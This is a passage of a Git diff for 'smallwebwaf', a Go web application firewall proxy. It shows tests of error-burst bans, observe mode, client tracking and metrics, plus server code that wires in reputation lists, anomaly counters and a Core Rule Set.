wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="limit"}`, 1)
wantMetric(t, metrics,
`smallwebwaf_offences_total{instance="app",kind="rule_blocked"}`, 2)
wantMetric(t, metrics,
`smallwebwaf_offences_total{instance="app",kind="token_refused"}`, 1)
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 1)
}
func TestErrorBurstIsNotLoweredForAClientWithLowerLimits(t *testing.T) {
t.Parallel()
geojsURL, _ := startGeoJS(t)
s, _, server := startWithClock(t, geojsURL, map[string]string{
lookupTimeout: "1h",
errorBurstThreshold: "2",
rulesDir: writeRules(t, testRules),
countryLimitPercent: countryDEHalf,
})
// Half of the threshold would be one, which the second refusal is over.
for range 2 {
line := blockRule.send(s, fromDE)
if line.LimitHit != "" {
t.Errorf("log line has limit_hit %q, want none", line.LimitHit)
}
}
blockRule.send(s, fromDE)
got := server.Ledger.Bans(netip.MustParsePrefix(fromDE + "/32"))
if len(got) != 1 || got[0].Notes.Limit != 2 || got[0].Notes.LimitPercent != nil {
t.Errorf("bans %+v, want one for the limit of 2, without a limit percentage", got)
}
}
func TestErrorBurstDoesNotCountTheAppsAnswers(t *testing.T) {
t.Parallel()
statuses := map[string]int{
"/missing": http.StatusNotFound,
"/private": http.StatusUnauthorized,
"/forbidden": http.StatusForbidden,
}
s, _, _, queue := startAppWithAlerts(t, func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(statuses[r.URL.Path])
}, map[string]string{errorBurstThreshold: "1", rulesDir: writeRules(t, testRules)})
for range 2 {
for path, status := range statuses {
s.request(client, path, status, requestlog.ActionForward)
}
}
// The first refusal is one, not over the threshold.
line := blockRule.send(s, client)
if line.LimitHit != "" {
t.Errorf("log line has limit_hit %q, want none", line.LimitHit)
}
// No ban was made, nor its alert raised.
s.request(client, "/missing", http.StatusNotFound, requestlog.ActionForward)
wantAlerts(t, queue)
}
func TestErrorBurstOffOrAtItsDefault(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
threshold string
// broken is whether the 31st refusal breaks the error burst.
broken bool
}{
{"", true},
{off, false},
} {
t.Run(errorBurstThreshold+"="+tc.threshold, func(t *testing.T) {
t.Parallel()
env := map[string]string{rulesDir: writeRules(t, testRules)}
if tc.threshold != "" {
env[errorBurstThreshold] = tc.threshold
}
s, _, _ := startWithClock(t, "", env)
var line logLine
for range 31 {
line = blockRule.send(s, client)
}
if broken := line.LimitHit == requestlog.LimitHitErrorBurst; broken != tc.broken {
t.Errorf("the 31st refusal broke the error burst: %t, want %t",
broken, tc.broken)
}
})
}
}
func TestErrorBurstCountsEachClientTheChecksApplyTo(t *testing.T) {
t.Parallel()
const (
allowed = "192.0.2.60" // in SWWAF_ALLOW_NETS
exempt = "192.0.2.50" // in SWWAF_RATE_LIMIT_EXEMPT_NETS
)
s, _, _ := startForErrorBurst(t, "1", map[string]string{
allowNets: allowed, rateLimitExemptNets: exempt,
})
// A client in SWWAF_ALLOW_NETS still needs the token, but is not
// counted.
for range 3 {
line := noMetricsToken.send(s, allowed)
if line.LimitHit != "" {
t.Errorf("log line has limit_hit %q, want none", line.LimitHit)
}
}
// One the rate limits do not apply to is.
noMetricsToken.send(s, exempt)
line := wrongAdminToken.send(s, exempt)
if line.LimitHit != requestlog.LimitHitErrorBurst {
t.Errorf("log line has limit_hit %q, want error_burst", line.LimitHit)
}
s.get(exempt, http.StatusForbidden, requestlog.ActionBanned)
}
func TestErrorBurstBanSetsTheRefusalsBackToZero(t *testing.T) {
t.Parallel()
s, clk, _ := startForErrorBurst(t, "1", map[string]string{limitBanDuration: "1s"})
blockRule.send(s, client)
blockRule.send(s, client)
// Within the same minute, once the ban has ended, the next refusal is
// the first again.
clk.advance(time.Second)
line := blockRule.send(s, client)
if line.LimitHit != "" {
t.Errorf("log line has limit_hit %q, want none", line.LimitHit)
}
}
func TestObserveModeLogsAndAlertsTheErrorBurst(t *testing.T) {
t.Parallel()
s, clk, server, queue := startWithAlerts(t, map[string]string{
mode: observe,
errorBurstThreshold: "1",
rulesDir: writeRules(t, testRules),
adminToken: adminSecret,
})
start := clk.Now()
held := bans.Ban{
Netblock: netip.MustParsePrefix(otherClient + "/32"),
Start: start,
Expires: start.Add(time.Hour),
Cause: bans.CauseAdmin,
}
server.Ledger.Load([]bans.Ban{held})
// Under a ban, enforce mode would have refused these before the
// endpoint, so their tokens are not counted.
for range 2 {
line := wrongAdminToken.send(s, otherClient)
wantWouldAction(t, line, requestlog.ActionBanned)
if line.LimitHit != "" {
t.Errorf("log line has limit_hit %q, want none", line.LimitHit)
}
}
// The block rule's refusal, which enforce mode would have answered 403,
// is the second of the client's, and would have banned it.
wrongAdminToken.send(s, client)
line := s.request(client, blockedPath, http.StatusOK, requestlog.ActionForward)
wantWouldAction(t, line, requestlog.ActionRuleBlocked)
if line.LimitHit != requestlog.LimitHitErrorBurst || line.BanExpires != "" {
t.Errorf("log line has limit_hit %q and ban_expires %q, want error_burst "+
"and none", line.LimitHit, line.BanExpires)
}
if got := server.Ledger.Snapshot(); len(got) != 1 || !reflect.DeepEqual(got[0], held) {
t.Errorf("bans %+v, want only the one held", got)
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 1 {
t.Fatalf("%d alerts wait, want 1: %+v", len(waiting), waiting)
}
notes, _ := waiting[0].Detail["notes"].(bans.Notes)
if notes.Kind != ratelimit.KindRefusals || notes.Count != 2 ||
notes.Request.Status != http.StatusForbidden {
t.Errorf("the alert's notes are %+v, want two refusals, the last answered 403",
notes)
}
alert := banAlert(alerts.EventBan, start, client, bans.Ban{
Netblock: netip.MustParsePrefix(client + "/32"), Cause: bans.CauseLimit,
Reason: "refusals per minute over the limit of 1", Notes: notes,
}, requestlog.FormatTime(start.Add(time.Hour)))
alert.Detail["mode"] = observe
wantAlerts(t, queue, alert)
}
+19
View File
@@ -18,6 +18,7 @@ func TestHistoryKeepsEachRequestOfTheClient(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
s, clk, server := startWithClock(t, geojsURL, map[string]string{ s, clk, server := startWithClock(t, geojsURL, map[string]string{
lookupTimeout: "1h",
rateLimitPerMinute: "2", rateLimitPerMinute: "2",
deniedCountries: "kp", deniedCountries: "kp",
}) })
@@ -56,6 +57,24 @@ func TestHistoryKeepsEachRequestOfTheClient(t *testing.T) {
} }
} }
func TestTableOfClientsHoldsAtMostMaxTrackedClients(t *testing.T) {
t.Parallel()
s, _, server := startWithClock(t, "", map[string]string{maxTrackedClients: "2"})
// The third client drops the least recently seen, the first, with its
// history.
for _, from := range []string{"192.0.2.1", "192.0.2.2", "192.0.2.3"} {
s.get(from, http.StatusOK, requestlog.ActionForward)
}
_, held := server.Limiter.Client(netip.MustParsePrefix("192.0.2.1/32"))
if server.Limiter.Len() != 2 || held {
t.Errorf("the table holds %d clients, the first among them: %t; want 2, "+
"without it", server.Limiter.Len(), held)
}
}
func TestHistoryCountsTheBodiesEachWay(t *testing.T) { func TestHistoryCountsTheBodiesEachWay(t *testing.T) {
t.Parallel() t.Parallel()
+5 -4
View File
@@ -22,17 +22,18 @@ const (
// database or through GeoJS, and notes them for the log line, unless // database or through GeoJS, and notes them for the log line, unless
// SWWAF_LOOKUP_SOURCE is off or the client is on a private, loopback or // SWWAF_LOOKUP_SOURCE is off or the client is on a private, loopback or
// link-local address, which no lookup can place. The lookup database // link-local address, which no lookup can place. The lookup database
// answers at once. With GeoJS, while a setting needs the answer, a new // answers at once. With GeoJS, while a setting needs the answer, such as a
// client's request waits for it. ctx is the request's own context. // country list or a biased threshold, a new client's request waits for it.
// ctx is the request's own context.
func (rq *request) lookUp(ctx context.Context) { func (rq *request) lookUp(ctx context.Context) {
if rq.h.config.LookupSource == "off" || !canBePlaced(rq.client) { if rq.h.config.LookupSource == "off" || !canBePlaced(rq.client) {
return return
} }
if rq.h.config.LookupSource == "file" { if rq.h.config.LookupSource == "file" {
rq.lookupAnswer = rq.h.lookupFile.LookUp(clientGroup(rq.client)) rq.lookupAnswer = rq.h.lookupFile.LookUp(rq.h.clientGroup(rq.client))
} else { } else {
rq.lookupAnswer = rq.h.geojs.LookUp(ctx, clientGroup(rq.client)) rq.lookupAnswer = rq.h.geojs.LookUp(ctx, rq.h.clientGroup(rq.client))
} }
rq.lookedUp = true rq.lookedUp = true
+7 -1
View File
@@ -22,6 +22,10 @@ import (
// and country. // and country.
type asnAndCountry struct{ asn, asName, country string } type asnAndCountry struct{ asn, asName, country string }
// fileSource is the SWWAF_LOOKUP_SOURCE that looks clients up in the
// lookup database.
const fileSource = "file"
func TestEveryClientIsLookedUpWithoutWaitingWhileNoSettingNeedsIt(t *testing.T) { func TestEveryClientIsLookedUpWithoutWaitingWhileNoSettingNeedsIt(t *testing.T) {
t.Parallel() t.Parallel()
@@ -178,7 +182,7 @@ func TestClientsAreLookedUpInTheLookupDatabaseAndGeoJSIsNotAsked(t *testing.T) {
fromKP + "/32": {ASN: asnKP, ASName: asNameKP, Country: "KP"}, fromKP + "/32": {ASN: asnKP, ASName: asNameKP, Country: "KP"},
}) })
s, clk, server := startWithClock(t, geojsURL, map[string]string{ s, clk, server := startWithClock(t, geojsURL, map[string]string{
lookupSource: "file", lookupSource: fileSource,
lookupDBPath: path, lookupDBPath: path,
allowedCountries: "DE", allowedCountries: "DE",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
@@ -245,6 +249,7 @@ func TestLookupHeadersArePassedToTheAppAndTheClientsOwnRemoved(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
addr, out, _ := startProxyWithClock(t, app.URL, geojsURL, time.Now, map[string]string{ addr, out, _ := startProxyWithClock(t, app.URL, geojsURL, time.Now, map[string]string{
trustedProxies: trustLocalhost, trustedProxies: trustLocalhost,
lookupTimeout: "1h",
addLookupHeaders: "true", addLookupHeaders: "true",
}) })
s := &sender{t: t, addr: addr, out: out} s := &sender{t: t, addr: addr, out: out}
@@ -345,6 +350,7 @@ const unansweredGeoJSURL = "unanswered://geojs/v1/ip/geo.json"
func TestMain(m *testing.M) { func TestMain(m *testing.M) {
transport, _ := http.DefaultTransport.(*http.Transport) transport, _ := http.DefaultTransport.(*http.Transport)
transport.RegisterProtocol("unanswered", unansweredGeoJS{}) transport.RegisterProtocol("unanswered", unansweredGeoJS{})
transport.RegisterProtocol("abuseipdb", abuseIPDBStandIn{})
m.Run() m.Run()
} }
+4 -4
View File
@@ -222,8 +222,8 @@ func TestMetricsCountLimitsAndBans(t *testing.T) {
metrics := s.scrape(scraper) metrics := s.scrape(scraper)
wantMetric(t, metrics, wantMetric(t, metrics,
`smallwebwaf_requests_total{action="denied",instance="app",status_class="none"}`, 1) `smallwebwaf_requests_total{action="denied",instance="app",status_class="none"}`, 1)
wantMetric(t, metrics, wantMetric(t, metrics, `smallwebwaf_rate_limit_hits_total{instance="app",`+
`smallwebwaf_rate_limit_hits_total{instance="app",window="minute"}`, 1) `kind="requests",window="minute"}`, 1)
wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="limit"}`, 1) wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="limit"}`, 1)
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 1) wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 1)
wantMetric(t, metrics, `smallwebwaf_active_bans{instance="app"}`, 1) wantMetric(t, metrics, `smallwebwaf_active_bans{instance="app"}`, 1)
@@ -238,8 +238,8 @@ func TestMetricsCountLimitsAndBans(t *testing.T) {
s.get(client, 0, requestlog.ActionRateLimited) s.get(client, 0, requestlog.ActionRateLimited)
metrics = s.scrape(scraper) metrics = s.scrape(scraper)
wantMetric(t, metrics, wantMetric(t, metrics, `smallwebwaf_rate_limit_hits_total{instance="app",`+
`smallwebwaf_rate_limit_hits_total{instance="app",window="minute"}`, 2) `kind="requests",window="minute"}`, 2)
wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="limit"}`, 2) wantMetric(t, metrics, `smallwebwaf_offences_total{instance="app",kind="limit"}`, 2)
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 2) wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="limit",instance="app"}`, 2)
wantMetric(t, metrics, `smallwebwaf_active_bans{instance="app"}`, 1) wantMetric(t, metrics, `smallwebwaf_active_bans{instance="app"}`, 1)
+3 -1
View File
@@ -5,6 +5,7 @@ import (
"io" "io"
"net/http" "net/http"
"net/netip" "net/netip"
"reflect"
"sync/atomic" "sync/atomic"
"testing" "testing"
"time" "time"
@@ -38,6 +39,7 @@ func TestObserveModeForwardsWhatEnforceModeRefuses(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
env := map[string]string{ env := map[string]string{
lookupTimeout: "1h",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
denyNets: denied, denyNets: denied,
deniedCountries: "kp", deniedCountries: "kp",
@@ -126,7 +128,7 @@ func TestObserveModeMakesNoBanAndKeepsTheBansItHas(t *testing.T) {
} }
got := server.Ledger.Snapshot() got := server.Ledger.Snapshot()
if len(got) != 1 || got[0] != kept { if len(got) != 1 || !reflect.DeepEqual(got[0], kept) {
t.Errorf("bans\n%+v\nwant only\n%+v", got, kept) t.Errorf("bans\n%+v\nwant only\n%+v", got, kept)
} }
} }
+26 -2
View File
@@ -122,6 +122,8 @@ func wantAnswer(t *testing.T, got answer, body []byte) {
func wantRequestFields(t *testing.T, line logLine, host string, sent, received int) { func wantRequestFields(t *testing.T, line logLine, host string, sent, received int) {
t.Helper() t.Helper()
bytes := float64(sent + received)
want := withTimings(line, requestlog.Line{ want := withTimings(line, requestlog.Line{
Type: requestType, Time: line.Time, Instance: "app", Type: requestType, Time: line.Time, Instance: "app",
ClientIP: localhost, Method: http.MethodPatch, Scheme: plain, Host: host, ClientIP: localhost, Method: http.MethodPatch, Scheme: plain, Host: host,
@@ -131,7 +133,10 @@ func wantRequestFields(t *testing.T, line logLine, host string, sent, received i
RequestID: line.RequestID, PeerIP: localhost, ClientGroup: localhost + "/32", RequestID: line.RequestID, PeerIP: localhost, ClientGroup: localhost + "/32",
ContentLength: int64(sent), ResponseContentType: "text/plain; charset=utf-8", ContentLength: int64(sent), ResponseContentType: "text/plain; charset=utf-8",
UpstreamStatus: http.StatusTeapot, Action: requestlog.ActionForward, UpstreamStatus: http.StatusTeapot, Action: requestlog.ActionForward,
Counts: ratelimit.Counts{Minute: 1, Hour: 1, Day: 1}, Counts: ratelimit.Counts{
Minute: 1, Hour: 1, Day: 1,
MinuteBytes: bytes, HourBytes: bytes, DayBytes: bytes,
},
}) })
if !reflect.DeepEqual(line.Line, want) { if !reflect.DeepEqual(line.Line, want) {
t.Errorf("log line\n%+v\nwant\n%+v", line.Line, want) t.Errorf("log line\n%+v\nwant\n%+v", line.Line, want)
@@ -315,7 +320,7 @@ func TestServerHasTheDefaultLimits(t *testing.T) {
server := proxy.New(proxy.Params{ server := proxy.New(proxy.Params{
Config: cfg, Config: cfg,
RequestLog: io.Discard, RequestLog: io.Discard,
ProcessLog: requestlog.NewProcessLogger(io.Discard, cfg.InstanceName), ProcessLog: requestlog.NewProcessLogger(io.Discard, cfg.InstanceName, cfg.LogLevel),
}) })
if server.Addr != ":8080" || server.MaxHeaderBytes != 28<<10 || if server.Addr != ":8080" || server.MaxHeaderBytes != 28<<10 ||
@@ -394,6 +399,25 @@ func TestAnswers502WhenTheAppCannotBeReached(t *testing.T) {
} }
} }
func TestLogLevelHoldsBackNoRequestLine(t *testing.T) {
t.Parallel()
// At error the warning that the request to the app failed is held back,
// and is written before the answer is.
addr, out := startProxy(t, "http://"+localhost+":1", map[string]string{
"SWWAF_LOG_LEVEL": "error",
})
wantStatus(t, get(t, addr, "/"), http.StatusBadGateway)
wantLine(t, out.requestLine(t), http.StatusBadGateway, requestlog.ActionUpstreamError)
for _, line := range out.lines(t) {
if line["type"] == "process" {
t.Errorf("process line %v, want none at error", line)
}
}
}
func TestLogsAnAnswerThatBrokeOff(t *testing.T) { func TestLogsAnAnswerThatBrokeOff(t *testing.T) {
t.Parallel() t.Parallel()
+118 -7
View File
@@ -12,13 +12,16 @@ import (
"time" "time"
"sneak.berlin/go/smallwebwaf/internal/alerts" "sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/bans" "sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/config" "sneak.berlin/go/smallwebwaf/internal/config"
"sneak.berlin/go/smallwebwaf/internal/lookup" "sneak.berlin/go/smallwebwaf/internal/lookup"
"sneak.berlin/go/smallwebwaf/internal/metrics" "sneak.berlin/go/smallwebwaf/internal/metrics"
"sneak.berlin/go/smallwebwaf/internal/ratelimit" "sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/rules" "sneak.berlin/go/smallwebwaf/internal/rules"
"sneak.berlin/go/smallwebwaf/internal/waf"
) )
// How smallwebwaf keeps connections to the app open between requests. // How smallwebwaf keeps connections to the app open between requests.
@@ -57,6 +60,9 @@ type Params struct {
// GeoJSURL is where clients' AS numbers and countries are looked up // GeoJSURL is where clients' AS numbers and countries are looked up
// while SWWAF_LOOKUP_SOURCE is geojs, normally lookup.URL. // while SWWAF_LOOKUP_SOURCE is geojs, normally lookup.URL.
GeoJSURL string GeoJSURL string
// AbuseIPDBURL is where clients are checked with AbuseIPDB while
// SWWAF_ABUSEIPDB_KEY is set, normally reputation.AbuseIPDBURL.
AbuseIPDBURL string
// LookupFile is the lookup database they are looked up in while // LookupFile is the lookup database they are looked up in while
// SWWAF_LOOKUP_SOURCE is file, and nil otherwise. // SWWAF_LOOKUP_SOURCE is file, and nil otherwise.
LookupFile *lookup.File LookupFile *lookup.File
@@ -68,20 +74,31 @@ type Params struct {
// against. // against.
Rules *rules.Files Rules *rules.Files
// Alerts receive the alert for each ban the proxy makes or makes // Alerts receive the alert for each ban the proxy makes or makes
// permanent, and for GeoJS failing. // permanent, for each count over an anomaly threshold, for each request
// whose client a blocklist, the CrowdSec decision list, a DNSBL zone or
// AbuseIPDB lists, for each request the Core Rule Set scores at or over
// SWWAF_WAF_ANOMALY_THRESHOLD, and for GeoJS failing, a fetch of a list
// failing, a query to a DNSBL zone or a check with AbuseIPDB failing,
// or the day's AbuseIPDB checks used up.
Alerts *alerts.Queue Alerts *alerts.Queue
} }
// Server is the server smallwebwaf runs, with the parts of the proxy // Server is the server smallwebwaf runs, with the parts of the proxy
// whose state the state files keep, the lookup database, nil unless // whose state the state files keep, the lookup database, nil unless
// SWWAF_LOOKUP_SOURCE is file, and the metrics. // SWWAF_LOOKUP_SOURCE is file, the lists fetched from URLs, which its Run
// fetches, the DNSBL zones' verdicts, AbuseIPDB's scores and checks
// spent, and the metrics.
type Server struct { type Server struct {
*http.Server *http.Server
Ledger *bans.Ledger Ledger *bans.Ledger
Limiter *ratelimit.Limiter Limiter *ratelimit.Limiter
GeoJS *lookup.GeoJS GeoJS *lookup.GeoJS
Anomalies *anomaly.Counters
LookupFile *lookup.File LookupFile *lookup.File
Lists *reputation.Lists
DNSBL *reputation.DNSBL
AbuseIPDB *reputation.AbuseIPDB
Metrics *metrics.Metrics Metrics *metrics.Metrics
} }
@@ -94,6 +111,7 @@ type Server struct {
func New(params Params) *Server { func New(params Params) *Server {
errorLog := slog.NewLogLogger(params.ProcessLog.Handler(), slog.LevelWarn) errorLog := slog.NewLogLogger(params.ProcessLog.Handler(), slog.LevelWarn)
m := metrics.New(params.Config.MetricsTopN, params.Config.InstanceName) m := metrics.New(params.Config.MetricsTopN, params.Config.InstanceName)
lists, dnsbl, abuseIPDB := newReputation(params, m)
h := &handler{ h := &handler{
config: params.Config, config: params.Config,
requestLog: params.RequestLog, requestLog: params.RequestLog,
@@ -106,7 +124,10 @@ func New(params Params) *Server {
PerMinute: params.Config.RateLimitPerMinute, PerMinute: params.Config.RateLimitPerMinute,
PerHour: params.Config.RateLimitPerHour, PerHour: params.Config.RateLimitPerHour,
PerDay: params.Config.RateLimitPerDay, PerDay: params.Config.RateLimitPerDay,
}), BytesPerMinute: params.Config.BytesLimitPerMinute,
BytesPerHour: params.Config.BytesLimitPerHour,
BytesPerDay: params.Config.BytesLimitPerDay,
}, params.Config.MaxTrackedClients),
ledger: bans.New(bans.Rules{ ledger: bans.New(bans.Rules{
LimitBanDuration: params.Config.LimitBanDuration, LimitBanDuration: params.Config.LimitBanDuration,
LimitBanRepeatWindow: params.Config.LimitBanRepeatWindow, LimitBanRepeatWindow: params.Config.LimitBanRepeatWindow,
@@ -114,18 +135,33 @@ func New(params Params) *Server {
AttackBanDuration: params.Config.AttackBanDuration, AttackBanDuration: params.Config.AttackBanDuration,
MaxBans: params.Config.MaxBans, MaxBans: params.Config.MaxBans,
}), }),
anomalies: anomaly.New(anomaly.Params{
Client: params.Config.AnomalyClient,
Net: params.Config.AnomalyNet,
ASN: params.Config.AnomalyASN,
Total: params.Config.AnomalyTotal,
Watch: params.Config.AnomalyWatch,
NetV4Prefix: params.Config.AnomalyNetV4Prefix,
NetV6Prefix: params.Config.AnomalyNetV6Prefix,
NamedNetblocks: params.Config.WatchNets,
Alerts: params.Alerts,
}),
lookupFile: params.LookupFile, lookupFile: params.LookupFile,
lists: lists,
dnsbl: dnsbl,
abuseIPDB: abuseIPDB,
rules: params.Rules, rules: params.Rules,
coreRuleSet: newCoreRuleSet(params.Config),
alerts: params.Alerts, alerts: params.Alerts,
} }
h.geojs = lookup.New(lookup.Params{ h.geojs = lookup.New(lookup.Params{
URL: params.GeoJSURL, URL: params.GeoJSURL,
Timeout: params.Config.LookupTimeout, Timeout: params.Config.LookupTimeout,
// The country lists and the headers act on the answer before the // The country lists, the headers and the biased thresholds act on
// request goes on. // the answer before the request goes on.
Wait: len(params.Config.DeniedCountries) > 0 || Wait: len(params.Config.DeniedCountries) > 0 ||
len(params.Config.ExclusivelyAllowedCountries) > 0 || len(params.Config.ExclusivelyAllowedCountries) > 0 ||
params.Config.AddLookupHeaders, params.Config.AddLookupHeaders || biasedThresholdsSet(params.Config),
Answered: h.addLookup, Answered: h.addLookup,
Now: params.Now, Now: params.Now,
ProcessLog: params.ProcessLog, ProcessLog: params.ProcessLog,
@@ -151,11 +187,72 @@ func New(params Params) *Server {
Ledger: h.ledger, Ledger: h.ledger,
Limiter: h.limiter, Limiter: h.limiter,
GeoJS: h.geojs, GeoJS: h.geojs,
Anomalies: h.anomalies,
LookupFile: h.lookupFile, LookupFile: h.lookupFile,
Lists: h.lists,
DNSBL: h.dnsbl,
AbuseIPDB: h.abuseIPDB,
Metrics: m, Metrics: m,
} }
} }
// newReputation returns the lists fetched from URLs, the DNSBL zones'
// verdicts and AbuseIPDB's scores, as the settings in params name them,
// with none fetched, asked for or checked yet, and adds their metrics to
// m, AbuseIPDB's while SWWAF_ABUSEIPDB_KEY is set.
func newReputation(
params Params, m *metrics.Metrics,
) (*reputation.Lists, *reputation.DNSBL, *reputation.AbuseIPDB) {
cfg := params.Config
lists := reputation.New(reputation.Params{
BlocklistURLs: cfg.BlocklistURLs, Refresh: cfg.BlocklistRefresh,
ASNLimitPercentURL: cfg.ASNLimitPercentURL,
CrowdSecDecisionsURL: cfg.CrowdSecDecisionsURL, CrowdSecKey: cfg.CrowdSecKey,
Now: params.Now, ProcessLog: params.ProcessLog, Alerts: params.Alerts,
})
dnsbl := reputation.NewDNSBL(reputation.DNSBLParams{
Zones: cfg.DNSBLZones, Resolver: cfg.DNSBLResolver, CacheTTL: cfg.ReputationCacheTTL,
Timeout: cfg.ReputationTimeout, Now: params.Now, ProcessLog: params.ProcessLog,
Alerts: params.Alerts,
})
abuseIPDB := reputation.NewAbuseIPDB(reputation.AbuseIPDBParams{
URL: params.AbuseIPDBURL, Key: cfg.AbuseIPDBKey, MinScore: cfg.AbuseIPDBMinScore,
DailyBudget: cfg.AbuseIPDBDailyBudget, CacheTTL: cfg.ReputationCacheTTL,
Timeout: cfg.ReputationTimeout, Now: params.Now, ProcessLog: params.ProcessLog,
Alerts: params.Alerts,
})
m.AddReputation(lists, dnsbl)
if cfg.AbuseIPDBKey != "" {
m.AddAbuseIPDB(abuseIPDB)
}
return lists, dnsbl, abuseIPDB
}
// newCoreRuleSet returns the Core Rule Set at SWWAF_WAF_PARANOIA_LEVEL,
// without the rules SWWAF_WAF_DISABLED_RULES switches off, reading bodies
// up to SWWAF_WAF_BODY_LIMIT, or nil while SWWAF_WAF_MODE is off.
func newCoreRuleSet(cfg *config.Config) *waf.CoreRuleSet {
if cfg.WAFMode == config.WAFModeOff {
return nil
}
coreRuleSet, err := waf.New(waf.Params{
ParanoiaLevel: cfg.WAFParanoiaLevel, DisabledRules: cfg.WAFDisabledRules,
BodyLimit: cfg.WAFBodyLimit,
})
if err != nil {
// The Core Rule Set is built in, and the settings cannot break it:
// the paranoia level is from 1 to 4, the body limit at most 1G, and
// the id of no rule switches nothing off.
panic(err)
}
return coreRuleSet
}
// handler is the proxy. It holds what every request shares; what belongs // handler is the proxy. It holds what every request shares; what belongs
// to one request is in a request. // to one request is in a request.
type handler struct { type handler struct {
@@ -169,8 +266,13 @@ type handler struct {
limiter *ratelimit.Limiter limiter *ratelimit.Limiter
ledger *bans.Ledger ledger *bans.Ledger
geojs *lookup.GeoJS geojs *lookup.GeoJS
anomalies *anomaly.Counters
lookupFile *lookup.File lookupFile *lookup.File
lists *reputation.Lists
dnsbl *reputation.DNSBL
abuseIPDB *reputation.AbuseIPDB
rules *rules.Files rules *rules.Files
coreRuleSet *waf.CoreRuleSet
alerts *alerts.Queue alerts *alerts.Queue
} }
@@ -206,8 +308,12 @@ func (h *handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
return return
} }
// Once the request has ended, before its log line is written. // Once the request has ended, before its log line is written. The
// last deferred runs first: countRefusal before addToHistory, so that
// a broken error burst is in the client's history.
defer rq.addToHistory() defer rq.addToHistory()
defer rq.countAnomalies()
defer rq.countRefusal()
refused := rq.check(r.Context()) refused := rq.check(r.Context())
rq.checked = time.Now() rq.checked = time.Now()
@@ -226,5 +332,10 @@ func (h *handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
return return
} }
// Once the response has ended, before the request is added to its
// client's history. Deferred, since ReverseProxy panics to end a
// response it cannot finish.
defer rq.countBytes()
rq.forward(r.Context()) rq.forward(r.Context())
} }
+15 -4
View File
@@ -61,6 +61,8 @@ const (
requestMaxBytes = "SWWAF_REQUEST_MAX_BYTES" requestMaxBytes = "SWWAF_REQUEST_MAX_BYTES"
responseMaxBytes = "SWWAF_RESPONSE_MAX_BYTES" responseMaxBytes = "SWWAF_RESPONSE_MAX_BYTES"
trustedProxies = "SWWAF_TRUSTED_PROXIES" trustedProxies = "SWWAF_TRUSTED_PROXIES"
ipv6GroupPrefix = "SWWAF_IPV6_GROUP_PREFIX"
maxTrackedClients = "SWWAF_MAX_TRACKED_CLIENTS"
allowNets = "SWWAF_ALLOW_NETS" allowNets = "SWWAF_ALLOW_NETS"
rateLimitExemptNets = "SWWAF_RATE_LIMIT_EXEMPT_NETS" rateLimitExemptNets = "SWWAF_RATE_LIMIT_EXEMPT_NETS"
denyNets = "SWWAF_DENY_NETS" denyNets = "SWWAF_DENY_NETS"
@@ -83,8 +85,12 @@ const (
logRequestHeaders = "SWWAF_LOG_REQUEST_HEADERS" logRequestHeaders = "SWWAF_LOG_REQUEST_HEADERS"
attackBanDuration = "SWWAF_ATTACK_BAN_DURATION" attackBanDuration = "SWWAF_ATTACK_BAN_DURATION"
rulesDir = "SWWAF_RULES_DIR" rulesDir = "SWWAF_RULES_DIR"
wafMode = "SWWAF_WAF_MODE"
) )
// off is the value that switches a setting off.
const off = "off"
// output collects what smallwebwaf writes on stdout. // output collects what smallwebwaf writes on stdout.
type output struct { type output struct {
mu sync.Mutex mu sync.Mutex
@@ -268,7 +274,10 @@ func startProxyWithAlerts(
// queue: they wait in it, for the test to look at. With no geojsURL, there // queue: they wait in it, for the test to look at. With no geojsURL, there
// is no stand-in for GeoJS to look clients up at, and SWWAF_LOOKUP_SOURCE // is no stand-in for GeoJS to look clients up at, and SWWAF_LOOKUP_SOURCE
// is off unless env sets it. While it is file, the lookup database // is off unless env sets it. While it is file, the lookup database
// SWWAF_LOOKUP_DB_PATH names is read. // SWWAF_LOOKUP_DB_PATH names is read. Clients are checked with AbuseIPDB
// at abuseIPDBURL while env sets SWWAF_ABUSEIPDB_KEY. SWWAF_WAF_MODE is off
// unless env sets it, so that only the tests of the Core Rule Set have
// their requests inspected by it.
func newProxy( func newProxy(
t *testing.T, appURL, geojsURL string, now func() time.Time, t *testing.T, appURL, geojsURL string, now func() time.Time,
env map[string]string, env map[string]string,
@@ -277,9 +286,10 @@ func newProxy(
settings := map[string]string{ settings := map[string]string{
"SWWAF_UPSTREAM_URL": appURL, rulesDir: t.TempDir(), instanceName: "app", "SWWAF_UPSTREAM_URL": appURL, rulesDir: t.TempDir(), instanceName: "app",
wafMode: off,
} }
if geojsURL == "" { if geojsURL == "" {
settings[lookupSource] = "off" settings[lookupSource] = off
} }
maps.Copy(settings, env) maps.Copy(settings, env)
@@ -294,7 +304,7 @@ func newProxy(
} }
out := &output{} out := &output{}
